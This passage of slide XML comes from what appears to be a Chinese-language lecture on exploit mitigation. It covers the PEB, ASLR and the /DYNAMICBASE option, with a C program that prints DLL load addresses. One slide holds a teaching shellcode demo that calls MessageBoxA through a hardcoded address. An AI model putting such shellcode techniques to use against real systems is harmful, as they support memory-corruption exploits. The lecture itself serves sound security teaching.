                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Process Environment Block</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="e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进程环境块）中的固定调用地址，所以为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的调用提供了方便。</a:t>
            </a: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地址空间分布随机化</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ASLR</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Address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Space Layout Randomization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）是一项通过将系统</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>关键地址随机化</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，从而使攻击者无法获得需要跳转的精确地址的技术。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文本框 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78ADE40B-0155-38EE-382D-7EBFB2DFCA05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1695305"/>
            <a:ext cx="4969198" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"user32.dll"</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_asm{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor ebx,ebx</a:t>
            </a:r>
          </a:p>
          <a:p>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0x20646C72</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0x6F77206F</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push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x6C6C6568</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mov eax, esp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>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push eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov eax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7E4507EA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//MessageBoxA</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="矩形 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B99F27-BEA4-E199-27F9-313A1458587E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991544" y="4813484"/>
            <a:ext cx="3038497" cy="360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A2DDE8C9-4791-2C35-2F00-87A23ACB457E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789301" y="1144535"/>
            <a:ext cx="476765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思考：如何防止</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执行？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2242299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ASLR</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95465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系统加载地址随机化</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82303"/>
            <a:ext cx="4824536" cy="2830711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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ASLR</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随机化的关键系统地址包括</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文件</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exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件</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映像加载地址、堆栈基址、堆地址、进程环境块和线程环境块地址等。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Windows Vista</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>上，当程序启动将执行文件加载到内存时，操作系统通过内核模块提供的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>功能，在原来映像基址的基础上加上一个随机数作为新的映像基址</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032" y="1155220"/>
            <a:ext cx="172354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编译器选项</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780408"/>
            <a:ext cx="5034025" cy="1596014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VS 2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>及更高版本提供了选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/DYNAMICBASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，使用该选项编译后的程序每次运行时，其内部的栈等结构的地址都会被随机化</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="20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82285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ASLR</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24631" y="1058913"/>
            <a:ext cx="5403119" cy="5093702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;windows.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>gvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>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PrintAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> address: 0x%p\n"</a:t>
            </a:r>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gvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    HINSTANCE handle = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>(TEXT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"kernel32.dll"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> (!handle) {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"load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> error!"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>         exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>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"kernel32.dll address: 0x%p\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>, handle);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>pvAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
